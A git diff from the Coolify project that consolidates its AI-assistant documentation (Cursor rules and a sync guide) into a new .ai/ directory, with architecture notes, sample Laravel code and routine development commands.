**.cursor/rules/coolify-ai-docs.mdc** - Master reference file for Cursor IDE (references `.ai/` directory) +3. **.ai/** - Single source of truth containing all detailed documentation + +All AI tools (Claude Code, Cursor IDE, etc.) reference the same `.ai/` directory to ensure consistency. + +## Structure + +### CLAUDE.md (Root Directory) +- **Purpose**: Entry point for Claude Code with quick-reference guide +- **Format**: Single markdown file +- **Includes**: + - Quick-reference development commands + - High-level architecture overview + - Essential patterns and guidelines + - References to detailed `.ai/` documentation + +### .cursor/rules/coolify-ai-docs.mdc +- **Purpose**: Master reference file for Cursor IDE +- **Format**: Single .mdc file with frontmatter +- **Content**: Quick decision tree and references to `.ai/` directory +- **Note**: Replaces all previous topic-specific .mdc files + +### .ai/ Directory (Single Source of Truth) +- **Purpose**: All detailed, topic-specific documentation +- **Format**: Organized markdown files by category +- **Structure**: + ``` + .ai/ + ├── README.md # Navigation hub + ├── core/ # Project information + │ ├── technology-stack.md # Version numbers (SINGLE SOURCE OF TRUTH) + │ ├── project-overview.md + │ ├── application-architecture.md + │ └── deployment-architecture.md + ├── development/ # Development practices + │ ├── development-workflow.md + │ ├── testing-patterns.md + │ └── laravel-boost.md + ├── patterns/ # Code patterns + │ ├── database-patterns.md + │ ├── frontend-patterns.md + │ ├── security-patterns.md + │ ├── form-components.md + │ └── api-and-routing.md + └── meta/ # Documentation guides + ├── maintaining-docs.md + └── sync-guide.md (this file) + ``` +- **Used by**: All AI tools through CLAUDE.md or coolify-ai-docs.mdc + +## Cross-References + +All systems reference the `.ai/` directory as the source of truth: + +- **CLAUDE.md** → references `.ai/` files for detailed documentation +- **.cursor/rules/coolify-ai-docs.mdc** → references `.ai/` files for detailed documentation +- **.ai/README.md** → provides navigation to all documentation + +## Maintaining Consistency + +### 1. Core Principles (MUST be consistent) + +These are defined ONCE in `.ai/core/technology-stack.md`: +- Laravel version (currently Laravel 12.4.1) +- PHP version (8.4.7) +- All package versions (Livewire 3.5.20, Tailwind 4.1.4, etc.) + +**Exception**: CLAUDE.md is permitted to show essential version numbers as a quick reference for convenience. These must stay synchronized with `technology-stack.md`. When updating versions, update both locations. + +Other critical patterns defined in `.ai/`: +- Testing execution rules (Docker for Feature tests, mocking for Unit tests) +- Security patterns and authorization requirements +- Code style requirements (Pint, PSR-12) + +### 2. Where to Make Changes + +**For version numbers** (Laravel, PHP, packages): +1. Update `.ai/core/technology-stack.md` (single source of truth) +2. Update CLAUDE.md quick reference section (essential versions only) +3. Verify both files stay synchronized +4. Never duplicate version numbers in other locations + +**For workflow changes** (how to run commands, development setup): +1. Update `.ai/development/development-workflow.md` +2. Update quick reference in CLAUDE.md if needed +3. Verify `.cursor/rules/coolify-ai-docs.mdc` references are correct + +**For architectural patterns** (how code should be structured): +1. Update appropriate file in `.ai/core/` +2. Add cross-references from related docs +3. Update CLAUDE.md if it needs to highlight this pattern + +**For code patterns** (how to write code): +1. Update appropriate file in `.ai/patterns/` +2. Add examples from real codebase +3. Cross-reference from related docs + +**For testing patterns**: +1. Update `.ai/development/testing-patterns.md` +2. Ensure CLAUDE.md testing section references it + +### 3. Update Checklist + +When making significant changes: + +- [ ] Identify if change affects core principles (version numbers, critical patterns) +- [ ] Update primary location in `.ai/` directory +- [ ] Check if CLAUDE.md needs quick-reference update +- [ ] Verify `.cursor/rules/coolify-ai-docs.mdc` references are still accurate +- [ ] Update cross-references in related `.ai/` files +- [ ] Verify all relative paths work correctly +- [ ] Test links in markdown files +- [ ] Run: `./vendor/bin/pint` on modified files (if applicable) + +### 4. Common Inconsistencies to Watch + +- **Version numbers**: Should ONLY exist in `.ai/core/technology-stack.md` +- **Testing instructions**: Docker execution requirements must be consistent +- **File paths**: Ensure relative paths work from their location +- **Command syntax**: Docker commands, artisan commands must be accurate +- **Cross-references**: Links must point to current file locations + +## File Organization + +``` +/ +├── CLAUDE.md # Claude Code entry point +├── .AI_INSTRUCTIONS_SYNC.md # Redirect to this file +├── .cursor/ +│ └── rules/ +│ └── coolify-ai-docs.mdc # Cursor IDE master reference +└── .ai/ # SINGLE SOURCE OF TRUTH + ├── README.md # Navigation hub + ├── core/ # Project information + ├── development/ # Development practices + ├── patterns/ # Code patterns + └── meta/ # Documentation guides +``` + +## Recent Updates + +### 2025-11-18 - Documentation Consolidation +- ✅ Consolidated all documentation into `.ai/` directory +- ✅ Created single source of truth for version numbers +- ✅ Reduced CLAUDE.md from 719 to 319 lines +- ✅ Replaced 11 .cursor/rules/*.mdc files with single coolify-ai-docs.mdc +- ✅ Organized by topic: core/, development/, patterns/, meta/ +- ✅ Standardized version numbers (Laravel 12.4.1, PHP 8.4.7, Tailwind 4.1.4) +- ✅ Created comprehensive navigation with .ai/README.md + +### 2025-10-07 +- ✅ Added cross-references between CLAUDE.md and .cursor/rules/ +- ✅ Synchronized Laravel version (12) across all files +- ✅ Added comprehensive testing execution rules (Docker for Feature tests) +- ✅ Added test design philosophy (prefer mocking over database) +- ✅ Fixed inconsistencies in testing documentation + +## Maintenance Commands + +```bash +# Check for version inconsistencies (should only be in technology-stack.md) +# Note: CLAUDE.md is allowed to show quick reference versions +grep -r "Laravel 12" .ai/ CLAUDE.md .cursor/rules/coolify-ai-docs.mdc +grep -r "PHP 8.4" .ai/ CLAUDE.md .cursor/rules/coolify-ai-docs.mdc + +# Check for broken cross-references to old .mdc files +grep -r "\.cursor/rules/.*\.mdc" .ai/ CLAUDE.md + +# Format all documentation +./vendor/bin/pint CLAUDE.md .ai/**/*.md + +# Search for specific patterns across all docs +grep -r "pattern_to_check" CLAUDE.md .ai/ .cursor/rules/ + +# Verify all markdown links work (from repository root) +find .ai -name "*.md" -exec grep -H "\[.*\](.*)" {} \; +``` + +## Contributing + +When contributing documentation: + +1. **Check `.ai/` directory** for existing documentation +2. **Update `.ai/` files** - this is the single source of truth +3. **Use cross-references** - never duplicate content +4. **Update CLAUDE.md** if adding critical quick-reference information +5. **Verify `.cursor/rules/coolify-ai-docs.mdc`** still references correctly +6. **Test all links** work from their respective locations +7. **Update this sync-guide.md** if changing organizational structure +8. **Verify consistency** before submitting PR + +## Questions? + +If unsure about where to document something: + +- **Version numbers** → `.ai/core/technology-stack.md` (ONLY location) +- **Quick reference / commands** → CLAUDE.md + `.ai/development/development-workflow.md` +- **Detailed patterns / examples** → `.ai/patterns/[topic].md` +- **Architecture / concepts** → `.ai/core/[topic].md` +- **Development practices** → `.ai/development/[topic].md` +- **Documentation guides** → `.ai/meta/[topic].md` + +**Golden Rule**: Each piece of information exists in ONE location in `.ai/`, other files reference it. + +When in doubt, prefer detailed documentation in `.ai/` and lightweight references in CLAUDE.md and coolify-ai-docs.mdc. diff --git a/.cursor/rules/api-and-routing.mdc b/.ai/patterns/api-and-routing.md similarity index 98% rename from .cursor/rules/api-and-routing.mdc rename to .ai/patterns/api-and-routing.md index 8321205ac..ceaadaad5 100644 --- a/.cursor/rules/api-and-routing.mdc +++ b/.ai/patterns/api-and-routing.md @@ -1,8 +1,3 @@ ---- -description: RESTful API design, routing patterns, webhooks, and HTTP communication -globs: routes/*.php, app/Http/Controllers/**/*.php, app/Http/Resources/*.php, app/Http/Requests/*.php -alwaysApply: false ---- # Coolify API & Routing Architecture ## Routing Structure diff --git a/.cursor/rules/database-patterns.mdc b/.ai/patterns/database-patterns.md similarity index 97% rename from .cursor/rules/database-patterns.mdc rename to .ai/patterns/database-patterns.md index ec60a43b3..1e40ea152 100644 --- a/.cursor/rules/database-patterns.mdc +++ b/.ai/patterns/database-patterns.md @@ -1,8 +1,3 @@ ---- -description: Database architecture, models, migrations, relationships, and data management patterns -globs: app/Models/*.php, database/migrations/*.php, database/seeders/*.php, app/Actions/Database/*.php -alwaysApply: false ---- # Coolify Database Architecture & Patterns ## Database Strategy diff --git a/.cursor/rules/form-components.mdc b/.ai/patterns/form-components.md similarity index 98% rename from .cursor/rules/form-components.mdc rename to .ai/patterns/form-components.md index 665ccfd98..3ff1d0f81 100644 --- a/.cursor/rules/form-components.mdc +++ b/.ai/patterns/form-components.md @@ -1,8 +1,3 @@ ---- -description: Enhanced form components with built-in authorization system -globs: resources/views/**/*.blade.php, app/View/Components/Forms/*.php -alwaysApply: true ---- # Enhanced Form Components with Authorization diff --git a/.cursor/rules/frontend-patterns.mdc b/.ai/patterns/frontend-patterns.md similarity index 98% rename from .cursor/rules/frontend-patterns.mdc rename to .ai/patterns/frontend-patterns.md index 4730160b2..675881608 100644 --- a/.cursor/rules/frontend-patterns.mdc +++ b/.ai/patterns/frontend-patterns.md @@ -1,8 +1,3 @@ ---- -description: Livewire components, Alpine.js patterns, Tailwind CSS, and enhanced form components -globs: app/Livewire/**/*.php, resources/views/**/*.blade.php, resources/js/**/*.js, resources/css/**/*.css -alwaysApply: false ---- # Coolify Frontend Architecture & Patterns ## Frontend Philosophy @@ -263,7 +258,7 @@ ### Benefits - **Automatic disabling** for unauthorized users - **Smart behavior** (disables instantSave on checkboxes for unauthorized users) -For complete documentation, see **[form-components.mdc](mdc:.cursor/rules/form-components.mdc)** +For complete documentation, see **[form-components.md](.ai/patterns/form-components.md)** ## Form Handling Patterns diff --git a/.cursor/rules/security-patterns.mdc b/.ai/patterns/security-patterns.md similarity index 99% rename from .cursor/rules/security-patterns.mdc rename to .ai/patterns/security-patterns.md index a7ab2ad69..ac1470ac9 100644 --- a/.cursor/rules/security-patterns.mdc +++ b/.ai/patterns/security-patterns.md @@ -1,8 +1,3 @@ ---- -description: Security architecture, authentication, authorization patterns, and enhanced form component security -globs: app/Policies/*.php, app/View/Components/Forms/*.php, app/Http/Middleware/*.php, resources/views/**/*.blade.php -alwaysApply: true ---- # Coolify Security Architecture & Patterns ## Security Philosophy diff --git a/.coderabbit.yaml b/.coderabbit.yaml deleted file mode 100644 index 24c099119..000000000 --- a/.coderabbit.yaml +++ /dev/null @@ -1,2 +0,0 @@ -reviews: - review_status: false diff --git a/.cursor/rules/README.mdc b/.cursor/rules/README.mdc deleted file mode 100644 index d0597bb72..000000000 --- a/.cursor/rules/README.mdc +++ /dev/null @@ -1,297 +0,0 @@ ---- -description: Complete guide to Coolify Cursor rules and development patterns -globs: .cursor/rules/*.mdc -alwaysApply: false ---- -# Coolify Cursor Rules - Complete Guide - -## Overview - -This comprehensive set of Cursor Rules provides deep insights into **Coolify**, an open-source self-hostable alternative to Heroku/Netlify/Vercel. These rules will help you understand, navigate, and contribute to this complex Laravel-based deployment platform. - -> **Cross-Reference**: This directory is for **detailed, topic-specific rules** used by Cursor IDE and other AI assistants. For Claude Code specifically, also see **[CLAUDE.md](mdc:CLAUDE.md)** which provides a condensed, workflow-focused guide. Both systems share core principles but are optimized for their respective tools. -> -> **Maintaining Rules**: When updating these rules, see **[.AI_INSTRUCTIONS_SYNC.md](mdc:.AI_INSTRUCTIONS_SYNC.md)** for synchronization guidelines to keep CLAUDE.md and .cursor/rules/ consistent. - -## Rule Categories - -### 🏗️ Architecture & Foundation -- **[project-overview.mdc](mdc:.cursor/rules/project-overview.mdc)** - What Coolify is and its core mission -- **[technology-stack.mdc](mdc:.cursor/rules/technology-stack.mdc)** - Complete technology stack and dependencies -- **[application-architecture.mdc](mdc:.cursor/rules/application-architecture.mdc)** - Laravel application structure and patterns - -### 🎨 Frontend Development -- **[frontend-patterns.mdc](mdc:.cursor/rules/frontend-patterns.mdc)** - Livewire + Alpine.js + Tailwind architecture -- **[form-components.mdc](mdc:.cursor/rules/form-components.mdc)** - Enhanced form components with built-in authorization - -### 🗄️ Data & Backend -- **[database-patterns.mdc](mdc:.cursor/rules/database-patterns.mdc)** - Database architecture, models, and data management -- **[deployment-architecture.mdc](mdc:.cursor/rules/deployment-architecture.mdc)** - Docker orchestration and deployment workflows - -### 🌐 API & Communication -- **[api-and-routing.mdc](mdc:.cursor/rules/api-and-routing.mdc)** - RESTful APIs, webhooks, and routing patterns - -### 🧪 Quality Assurance -- **[testing-patterns.mdc](mdc:.cursor/rules/testing-patterns.mdc)** - Testing strategies with Pest PHP and Laravel Dusk - -### 🔧 Development Process -- **[development-workflow.mdc](mdc:.cursor/rules/development-workflow.mdc)** - Development setup, coding standards, and contribution guidelines - -### 🔒 Security -- **[security-patterns.mdc](mdc:.cursor/rules/security-patterns.mdc)** - Security architecture, authentication, and best practices - -## Quick Navigation - -### Core Application Files -- **[app/Models/Application.php](mdc:app/Models/Application.php)** - Main application entity (74KB, highly complex) -- **[app/Models/Server.php](mdc:app/Models/Server.php)** - Server management (46KB, complex) -- **[app/Models/Service.php](mdc:app/Models/Service.php)** - Service definitions (58KB, complex) -- **[app/Models/Team.php](mdc:app/Models/Team.php)** - Multi-tenant structure (8.9KB) - -### Configuration Files -- **[composer.json](mdc:composer.json)** - PHP dependencies and Laravel setup -- **[package.json](mdc:package.json)** - Frontend dependencies and build scripts -- **[vite.config.js](mdc:vite.config.js)** - Frontend build configuration -- **[docker-compose.dev.yml](mdc:docker-compose.dev.yml)** - Development environment - -### API Documentation -- **[openapi.json](mdc:openapi.json)** - Complete API documentation (373KB) -- **[routes/api.php](mdc:routes/api.php)** - API endpoint definitions (13KB) -- **[routes/web.php](mdc:routes/web.php)** - Web application routes (21KB) - -## Key Concepts to Understand - -### 1. Multi-Tenant Architecture -Coolify uses a **team-based multi-tenancy** model where: -- Users belong to multiple teams -- Resources are scoped to teams -- Access control is team-based -- Data isolation is enforced at the database level - -### 2. Deployment Philosophy -- **Docker-first** approach for all deployments -- **Zero-downtime** deployments with health checks -- **Git-based** workflows with webhook integration -- **Multi-server** support with SSH connections - -### 3. Technology Stack -- **Backend**: Laravel 12 + PHP 8.4 -- **Frontend**: Livewire 3.5 + Alpine.js + Tailwind CSS 4.1 -- **Database**: PostgreSQL 15 + Redis 7 -- **Containerization**: Docker + Docker Compose -- **Testing**: Pest PHP 3.8 + Laravel Dusk - -### 4. Security Model -- **Defense-in-depth** security architecture -- **OAuth integration** with multiple providers -- **API token** authentication with Sanctum -- **Encrypted storage** for sensitive data -- **SSH key** management for server access - -## Development Quick Start - -### Local Setup -```bash -# Clone and setup -git clone https://github.com/coollabsio/coolify.git -cd coolify -cp .env.example .env - -# Docker development (recommended) -docker-compose -f docker-compose.dev.yml up -d -docker-compose exec app composer install -docker-compose exec app npm install -docker-compose exec app php artisan migrate -``` - -### Code Quality -```bash -# PHP code style -./vendor/bin/pint - -# Static analysis -./vendor/bin/phpstan analyse - -# Run tests -./vendor/bin/pest -``` - -## Common Patterns - -### Livewire Components -```php -class ApplicationShow extends Component -{ - public Application $application; - - protected $listeners = [ - 'deployment.started' => 'refresh', - 'deployment.completed' => 'refresh', - ]; - - public function deploy(): void - { - $this->authorize('deploy', $this->application); - app(ApplicationDeploymentService::class)->deploy($this->application); - } -} -``` - -### API Controllers -```php -class ApplicationController extends Controller -{ - public function __construct() - { - $this->middleware('auth:sanctum'); - $this->middleware('team.access'); - } - - public function deploy(Application $application): JsonResponse - { - $this->authorize('deploy', $application); - $deployment = app(ApplicationDeploymentService::class)->deploy($application); - return response()->json(['deployment_id' => $deployment->id]); - } -} -``` - -### Queue Jobs -```php -class DeployApplicationJob implements ShouldQueue -{ - public function handle(DockerService $dockerService): void - { - $this->deployment->update(['status' => 'running']); - - try { - $dockerService->deployContainer($this->deployment->application); - $this->deployment->update(['status' => 'success']); - } catch (Exception $e) { - $this->deployment->update(['status' => 'failed']); - throw $e; - } - } -} -``` - -## Testing Patterns - -### Feature Tests -```php -test('user can deploy application via API', function () { - $user = User::factory()->create(); - $application = Application::factory()->create(['team_id' => $user->currentTeam->id]); - - $response = $this->actingAs($user) - ->postJson("/api/v1/applications/{$application->id}/deploy"); - - $response->assertStatus(200); - expect($application->deployments()->count())->toBe(1); -}); -``` - -### Browser Tests -```php -test('user can create application through UI', function () { - $user = User::factory()->create(); - - $this->browse(function (Browser $browser) use ($user) { - $browser->loginAs($user) - ->visit('/applications/create') - ->type('name', 'Test App') - ->press('Create Application') - ->assertSee('Application created successfully'); - }); -}); -``` - -## Security Considerations - -### Authentication -- Multi-provider OAuth support -- API token authentication -- Team-based access control -- Session management - -### Data Protection -- Encrypted environment variables -- Secure SSH key storage -- Input validation and sanitization -- SQL injection prevention - -### Container Security -- Non-root container users -- Minimal capabilities -- Read-only filesystems -- Network isolation - -## Performance Optimization - -### Database -- Eager loading relationships -- Query optimization -- Connection pooling -- Caching strategies - -### Frontend -- Lazy loading components -- Asset optimization -- CDN integration -- Real-time updates via WebSockets - -## Contributing Guidelines - -### Code Standards -- PSR-12 PHP coding standards -- Laravel best practices -- Comprehensive test coverage -- Security-first approach - -### Pull Request Process -1. Fork repository -2. Create feature branch -3. Implement with tests -4. Run quality checks -5. Submit PR with clear description - -## Useful Commands - -### Development -```bash -# Start development environment -docker-compose -f docker-compose.dev.yml up -d - -# Run tests -./vendor/bin/pest - -# Code formatting -./vendor/bin/pint - -# Frontend development -npm run dev -``` - -### Production -```bash -# Install Coolify -curl -fsSL https://cdn.coollabs.io/coolify/install.sh | bash - -# Update Coolify -./scripts/upgrade.sh -``` - -## Resources - -### Documentation -- **[README.md](mdc:README.md)** - Project overview and installation -- **[CONTRIBUTING.md](mdc:CONTRIBUTING.md)** - Contribution guidelines -- **[CHANGELOG.md](mdc:CHANGELOG.md)** - Release history -- **[TECH_STACK.md](mdc:TECH_STACK.md)** - Technology overview - -### Configuration -- **[config/](mdc:config)** - Laravel configuration files -- **[database/migrations/](mdc:database/migrations)** - Database schema -- **[tests/](mdc:tests)** - Test suite - -This comprehensive rule set provides everything needed to understand, develop, and contribute to the Coolify project effectively. Each rule focuses on specific aspects while maintaining connections to the broader architecture. diff --git a/.cursor/rules/application-architecture.mdc b/.cursor/rules/application-architecture.mdc deleted file mode 100644 index ef8d549ad..000000000 --- a/.cursor/rules/application-architecture.mdc +++ /dev/null @@ -1,368 +0,0 @@ ---- -description: Laravel application structure, patterns, and architectural decisions -globs: app/**/*.php, config/*.php, bootstrap/**/*.php -alwaysApply: false ---- -# Coolify Application Architecture - -## Laravel Project Structure - -### **Core Application Directory** ([app/](mdc:app)) - -``` -app/ -├── Actions/ # Business logic actions (Action pattern) -├── Console/ # Artisan commands -├── Contracts/ # Interface definitions -├── Data/ # Data Transfer Objects (Spatie Laravel Data) -├── Enums/ # Enumeration classes -├── Events/ # Event classes -├── Exceptions/ # Custom exception classes -├── Helpers/ # Utility helper classes -├── Http/ # HTTP layer (Controllers, Middleware, Requests) -├── Jobs/ # Background job classes -├── Listeners/ # Event listeners -├── Livewire/ # Livewire components (Frontend) -├── Models/ # Eloquent models (Domain entities) -├── Notifications/ # Notification classes -├── Policies/ # Authorization policies -├── Providers/ # Service providers -├── Repositories/ # Repository pattern implementations -├── Services/ # Service layer classes -├── Traits/ # Reusable trait classes -└── View/ # View composers and creators -``` - -## Core Domain Models - -### **Infrastructure Management** - -#### **[Server.php](mdc:app/Models/Server.php)** (46KB, 1343 lines) -- **Purpose**: Physical/virtual server management -- **Key Relationships**: - - `hasMany(Application::class)` - Deployed applications - - `hasMany(StandalonePostgresql::class)` - Database instances - - `belongsTo(Team::class)` - Team ownership -- **Key Features**: - - SSH connection management - - Resource monitoring - - Proxy configuration (Traefik/Caddy) - - Docker daemon interaction - -#### **[Application.php](mdc:app/Models/Application.php)** (74KB, 1734 lines) -- **Purpose**: Application deployment and management -- **Key Relationships**: - - `belongsTo(Server::class)` - Deployment target - - `belongsTo(Environment::class)` - Environment context - - `hasMany(ApplicationDeploymentQueue::class)` - Deployment history -- **Key Features**: - - Git repository integration - - Docker build and deployment - - Environment variable management - - SSL certificate handling - -#### **[Service.php](mdc:app/Models/Service.php)** (58KB, 1325 lines) -- **Purpose**: Multi-container service orchestration -- **Key Relationships**: - - `hasMany(ServiceApplication::class)` - Service components - - `hasMany(ServiceDatabase::class)` - Service databases - - `belongsTo(Environment::class)` - Environment context -- **Key Features**: - - Docker Compose generation - - Service dependency management - - Health check configuration - -### **Team & Project Organization** - -#### **[Team.php](mdc:app/Models/Team.php)** (8.9KB, 308 lines) -- **Purpose**: Multi-tenant team management -- **Key Relationships**: - - `hasMany(User::class)` - Team members - - `hasMany(Project::class)` - Team projects - - `hasMany(Server::class)` - Team servers -- **Key Features**: - - Resource limits and quotas - - Team-based access control - - Subscription management - -#### **[Project.php](mdc:app/Models/Project.php)** (4.3KB, 156 lines) -- **Purpose**: Project organization and grouping -- **Key Relationships**: - - `hasMany(Environment::class)` - Project environments - - `belongsTo(Team::class)` - Team ownership -- **Key Features**: - - Environment isolation - - Resource organization - -#### **[Environment.php](mdc:app/Models/Environment.php)** -- **Purpose**: Environment-specific configuration -- **Key Relationships**: - - `hasMany(Application::class)` - Environment applications - - `hasMany(Service::class)` - Environment services - - `belongsTo(Project::class)` - Project context - -### **Database Management Models** - -#### **Standalone Database Models** -- **[StandalonePostgresql.php](mdc:app/Models/StandalonePostgresql.php)** (11KB, 351 lines) -- **[StandaloneMysql.php](mdc:app/Models/StandaloneMysql.php)** (11KB, 351 lines) -- **[StandaloneMariadb.php](mdc:app/Models/StandaloneMariadb.php)** (10KB, 337 lines) -- **[StandaloneMongodb.php](mdc:app/Models/StandaloneMongodb.php)** (12KB, 370 lines) -- **[StandaloneRedis.php](mdc:app/Models/StandaloneRedis.php)** (12KB, 394 lines) -- **[StandaloneKeydb.php](mdc:app/Models/StandaloneKeydb.php)** (11KB, 347 lines) -- **[StandaloneDragonfly.php](mdc:app/Models/StandaloneDragonfly.php)** (11KB, 347 lines) -- **[StandaloneClickhouse.php](mdc:app/Models/StandaloneClickhouse.php)** (10KB, 336 lines) - -**Common Features**: -- Database configuration management -- Backup scheduling and execution -- Connection string generation -- Health monitoring - -### **Configuration & Settings** - -#### **[EnvironmentVariable.php](mdc:app/Models/EnvironmentVariable.php)** (7.6KB, 219 lines) -- **Purpose**: Application environment variable management -- **Key Features**: - - Encrypted value storage - - Build-time vs runtime variables - - Shared variable inheritance - -#### **[InstanceSettings.php](mdc:app/Models/InstanceSettings.php)** (3.2KB, 124 lines) -- **Purpose**: Global Coolify instance configuration -- **Key Features**: - - FQDN and port configuration - - Auto-update settings - - Security configurations - -## Architectural Patterns - -### **Action Pattern** ([app/Actions/](mdc:app/Actions)) - -Using [lorisleiva/laravel-actions](mdc:composer.json) for business logic encapsulation: - -```php -// Example Action structure -class DeployApplication extends Action -{ - public function handle(Application $application): void - { - // Business logic for deployment - } - - public function asJob(Application $application): void - { - // Queue job implementation - } -} -``` - -**Key Action Categories**: -- **Application/**: Deployment and management actions -- **Database/**: Database operations -- **Server/**: Server management actions -- **Service/**: Service orchestration actions - -### **Repository Pattern** ([app/Repositories/](mdc:app/Repositories)) - -Data access abstraction layer: -- Encapsulates database queries -- Provides testable data layer -- Abstracts complex query logic - -### **Service Layer** ([app/Services/](mdc:app/Services)) - -Business logic services: -- External API integrations -- Complex business operations -- Cross-cutting concerns - -## Data Flow Architecture - -### **Request Lifecycle** - -1. **HTTP Request** → [routes/web.php](mdc:routes/web.php) -2. **Middleware** → Authentication, authorization -3. **Livewire Component** → [app/Livewire/](mdc:app/Livewire) -4. **Action/Service** → Business logic execution -5. **Model/Repository** → Data persistence -6. **Response** → Livewire reactive update - -### **Background Processing** - -1. **Job Dispatch** → Queue system (Redis) -2. **Job Processing** → [app/Jobs/](mdc:app/Jobs) -3. **Action Execution** → Business logic -4. **Event Broadcasting** → Real-time updates -5. **Notification** → User feedback - -## Security Architecture - -### **Multi-Tenant Isolation** - -```php -// Team-based query scoping -class Application extends Model -{ - public function scopeOwnedByCurrentTeam($query) - { - return $query->whereHas('environment.project.team', function ($q) { - $q->where('id', currentTeam()->id); - }); - } -} -``` - -### **Authorization Layers** - -1. **Team Membership** → User belongs to team -2. **Resource Ownership** → Resource belongs to team -3. **Policy Authorization** → [app/Policies/](mdc:app/Policies) -4. **Environment Isolation** → Project/environment boundaries - -### **Data Protection** - -- **Environment Variables**: Encrypted at rest -- **SSH Keys**: Secure storage and transmission -- **API Tokens**: Sanctum-based authentication -- **Audit Logging**: [spatie/laravel-activitylog](mdc:composer.json) - -## Configuration Hierarchy - -### **Global Configuration** -- **[InstanceSettings](mdc:app/Models/InstanceSettings.php)**: System-wide settings -- **[config/](mdc:config)**: Laravel configuration files - -### **Team Configuration** -- **[Team](mdc:app/Models/Team.php)**: Team-specific settings -- **[ServerSetting](mdc:app/Models/ServerSetting.php)**: Server configurations - -### **Project Configuration** -- **[ProjectSetting](mdc:app/Models/ProjectSetting.php)**: Project settings -- **[Environment](mdc:app/Models/Environment.php)**: Environment variables - -### **Application Configuration** -- **[ApplicationSetting](mdc:app/Models/ApplicationSetting.php)**: App-specific settings -- **[EnvironmentVariable](mdc:app/Models/EnvironmentVariable.php)**: Runtime configuration - -## Event-Driven Architecture - -### **Event Broadcasting** ([app/Events/](mdc:app/Events)) - -Real-time updates using Laravel Echo and WebSockets: - -```php -// Example event structure -class ApplicationDeploymentStarted implements ShouldBroadcast -{ - public function broadcastOn(): array - { - return [ - new PrivateChannel("team.{$this->application->team->id}"), - ]; - } -} -``` - -### **Event Listeners** ([app/Listeners/](mdc:app/Listeners)) - -- Deployment status updates -- Resource monitoring alerts -- Notification dispatching -- Audit log creation - -## Database Design Patterns - -### **Polymorphic Relationships** - -```php -// Environment variables can belong to multiple resource types -class EnvironmentVariable extends Model -{ - public function resource(): MorphTo - { - return $this->morphTo(); - } -} -``` - -### **Team-Based Soft Scoping** - -All major resources include team-based query scoping: - -```php -// Automatic team filtering -$applications = Application::ownedByCurrentTeam()->get(); -$servers = Server::ownedByCurrentTeam()->get(); -``` - -### **Configuration Inheritance** - -Environment variables cascade from: -1. **Shared Variables** → Team-wide defaults -2. **Project Variables** → Project-specific overrides -3. **Application Variables** → Application-specific values - -## Integration Patterns - -### **Git Provider Integration** - -Abstracted git operations supporting: -- **GitHub**: [app/Models/GithubApp.php](mdc:app/Models/GithubApp.php) -- **GitLab**: [app/Models/GitlabApp.php](mdc:app/Models/GitlabApp.php) -- **Bitbucket**: Webhook integration -- **Gitea**: Self-hosted Git support - -### **Docker Integration** - -- **Container Management**: Direct Docker API communication -- **Image Building**: Dockerfile and Buildpack support -- **Network Management**: Custom Docker networks -- **Volume Management**: Persistent storage handling - -### **SSH Communication** - -- **[phpseclib/phpseclib](mdc:composer.json)**: Secure SSH connections -- **Multiplexing**: Connection pooling for efficiency -- **Key Management**: [PrivateKey](mdc:app/Models/PrivateKey.php) model - -## Testing Architecture - -### **Test Structure** ([tests/](mdc:tests)) - -``` -tests/ -├── Feature/ # Integration tests -├── Unit/ # Unit tests -├── Browser/ # Dusk browser tests -├── Traits/ # Test helper traits -├── Pest.php # Pest configuration -└── TestCase.php # Base test case -``` - -### **Testing Patterns** - -- **Feature Tests**: Full request lifecycle testing -- **Unit Tests**: Individual class/method testing -- **Browser Tests**: End-to-end user workflows -- **Database Testing**: Factories and seeders - -## Performance Considerations - -### **Query Optimization** - -- **Eager Loading**: Prevent N+1 queries -- **Query Scoping**: Team-based filtering -- **Database Indexing**: Optimized for common queries - -### **Caching Strategy** - -- **Redis**: Session and cache storage -- **Model Caching**: Frequently accessed data -- **Query Caching**: Expensive query results - -### **Background Processing** - -- **Queue Workers**: Horizon-managed job processing -- **Job Batching**: Related job grouping -- **Failed Job Handling**: Automatic retry logic diff --git a/.cursor/rules/coolify-ai-docs.mdc b/.cursor/rules/coolify-ai-docs.mdc new file mode 100644 index 000000000..d99cc1692 --- /dev/null +++ b/.cursor/rules/coolify-ai-docs.mdc @@ -0,0 +1,156 @@ +--- +title: Coolify AI Documentation +description: Master reference to all Coolify AI documentation in .ai/ directory +globs: **/* +alwaysApply: true +--- + +# Coolify AI Documentation + +All Coolify AI documentation has been consolidated in the **`.ai/`** directory for better organization and single source of truth. + +## Quick Start + +- **For Claude Code**: Start with `CLAUDE.md` in the root directory +- **For Cursor IDE**: Start with `.ai/README.md` for navigation +- **For All AI Tools**: Browse `.ai/` directory by topic + +## Documentation Structure + +All detailed documentation lives in `.ai/` with the following organization: + +### 📚 Core Documentation +- **[Technology Stack](.ai/core/technology-stack.md)** - All versions, packages, dependencies (SINGLE SOURCE OF TRUTH for versions) +- **[Project Overview](.ai/core/project-overview.md)** - What Coolify is, high-level architecture +- **[Application Architecture](.ai/core/application-architecture.md)** - System design, components, relationships +- **[Deployment Architecture](.ai/core/deployment-architecture.md)** - Deployment flows, Docker, proxies + +### 💻 Development +- **[Development Workflow](.ai/development/development-workflow.md)** - Dev setup, commands, daily workflows +- **[Testing Patterns](.ai/development/testing-patterns.md)** - How to write/run tests, Docker requirements +- **[Laravel Boost](.ai/development/laravel-boost.md)** - Laravel-specific guidelines (SINGLE SOURCE for Laravel Boost) + +### 🎨 Code Patterns +- **[Database Patterns](.ai/patterns/database-patterns.md)** - Eloquent, migrations, relationships +- **[Frontend Patterns](.ai/patterns/frontend-patterns.md)** - Livewire, Alpine.js, Tailwind CSS +- **[Security Patterns](.ai/patterns/security-patterns.md)** - Auth, authorization, security +- **[Form Components](.ai/patterns/form-components.md)** - Enhanced forms with authorization +- **[API & Routing](.ai/patterns/api-and-routing.md)** - API design, routing conventions + +### 📖 Meta +- **[Maintaining Docs](.ai/meta/maintaining-docs.md)** - How to update/improve documentation +- **[Sync Guide](.ai/meta/sync-guide.md)** - Keeping docs synchronized + +## Quick Decision Tree + +**What are you working on?** + +### Running Commands +→ `.ai/development/development-workflow.md` +- `npm run dev` / `npm run build` - Frontend +- `php artisan serve` / `php artisan migrate` - Backend +- `docker exec coolify php artisan test` - Feature tests (requires Docker) +- `./vendor/bin/pest tests/Unit` - Unit tests (no Docker needed) +- `./vendor/bin/pint` - Code formatting + +### Writing Tests +→ `.ai/development/testing-patterns.md` +- **Unit tests**: No database, use mocking, run outside Docker +- **Feature tests**: Can use database, MUST run inside Docker +- Critical: Docker execution 